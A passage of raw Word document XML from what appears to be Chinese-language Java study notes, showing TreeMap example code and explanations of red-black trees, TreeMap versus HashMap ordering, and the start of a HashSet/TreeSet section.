                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>treeMap2</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.put(</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>treeMap2</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.put(</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"a"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"1"</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        System.</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>out</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.println(</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"treeMap2="</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>treeMap2</w:t>
            </w:r>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">);  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRPr="00117411" w:rsidRDefault="00A53EDB" w:rsidP="00A53EDB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00117411">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A53EDB" w:rsidRDefault="00A53EDB" w:rsidP="00B920EF">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="125" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="313" w:lineRule="atLeast"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A53EDB" w:rsidRDefault="00A53EDB" w:rsidP="00B920EF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="313" w:lineRule="atLeast"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD0216" w:rsidRPr="00BE59DF" w:rsidRDefault="00FD0216" w:rsidP="00FD0216">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.7.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>红黑树</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD0216" w:rsidRPr="00E20534" w:rsidRDefault="00FD0216" w:rsidP="00FD0216">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TreeMap:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>基于红黑树实现。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TreeMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20534">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>没有调优选项，因为该树总处于平衡状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD0216" w:rsidRDefault="00FD0216" w:rsidP="00FD0216">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>对其内容进行快速查找，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> TreeMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中所有的元素都保持着某种固定的顺序，如果你需要得到一个有序的结果你就应该使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TreeMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00590C1E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中元素的排列顺序是不固定的）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD0216" w:rsidRDefault="00FD0216" w:rsidP="00FD0216">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>TreeMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>可以根据它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的排序。然而，有时候我们需要根据它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>进行排序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51169" w:rsidRDefault="00762458" w:rsidP="00FD0216">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidR="00F21E49" w:rsidRPr="00FD4286">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>http://www.tuicool.com/articles/zIVvyub</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F21E49" w:rsidRPr="00BE59DF" w:rsidRDefault="00F21E49" w:rsidP="00F21E49">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.7.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>平衡二叉树</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F21E49" w:rsidRDefault="00F21E49" w:rsidP="00FD0216">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B920EF" w:rsidRPr="00FD0216" w:rsidRDefault="00B920EF" w:rsidP="000E7DED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E47270" w:rsidRPr="006E3A0D" w:rsidRDefault="00B66F71" w:rsidP="006E3A0D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00556929" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  HashSet</w:t>
      </w:r>
      <w:r w:rsidR="003A2BAC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="003A2BAC" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>TreeSet</w:t>
      </w:r>
      <w:r w:rsidR="00556929" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00556929" w:rsidRPr="00F41A4C" w:rsidRDefault="007B2F52" w:rsidP="00556929">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如何实现？与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>有什么关系？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E47270" w:rsidRPr="00F41A4C" w:rsidRDefault="00DE66F6" w:rsidP="00556929">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE66F6" w:rsidRPr="00F41A4C" w:rsidRDefault="00DE66F6" w:rsidP="00DE66F6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEF2"/>
        <w:spacing w:before="150" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="293" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
